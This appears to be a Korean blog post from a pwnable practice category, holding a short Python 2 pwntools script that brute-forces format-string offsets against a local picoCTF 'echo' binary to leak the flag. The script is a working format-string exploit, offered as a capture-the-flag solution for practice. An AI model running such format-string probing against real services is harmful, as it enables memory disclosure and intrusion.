exploit.py


from pwn import *

  

p = process("./echo")


for i in range(1,100):

    try:

        p = process("./echo")

        payload ="%"+str(i)+"$s"

        p.sendlineafter("> ",payload)

        result = p.recv(2048)

        if "picoCTF" in result:

            print result

            break

        p.close()

    except:

        print "fail"

        p.close()


'System > Pwnable Practice' 카테고리의 다른 글

Plaid CTF 2015 ebp  (0) 2019.08.06
Layer7 CTF 2018 Life Game  (0) 2019.08.05
Layer7 CTF 2018 Talmoru_party!~  (0) 2019.08.02
Defcon CTF 2019 Speedrun 1,2  (0) 2019.08.01
Harekaze CTF 2019 Baby ROP 1,2  (0) 2019.08.01
블로그 이미지

JeonYoungSin

메모 기록용 공간

,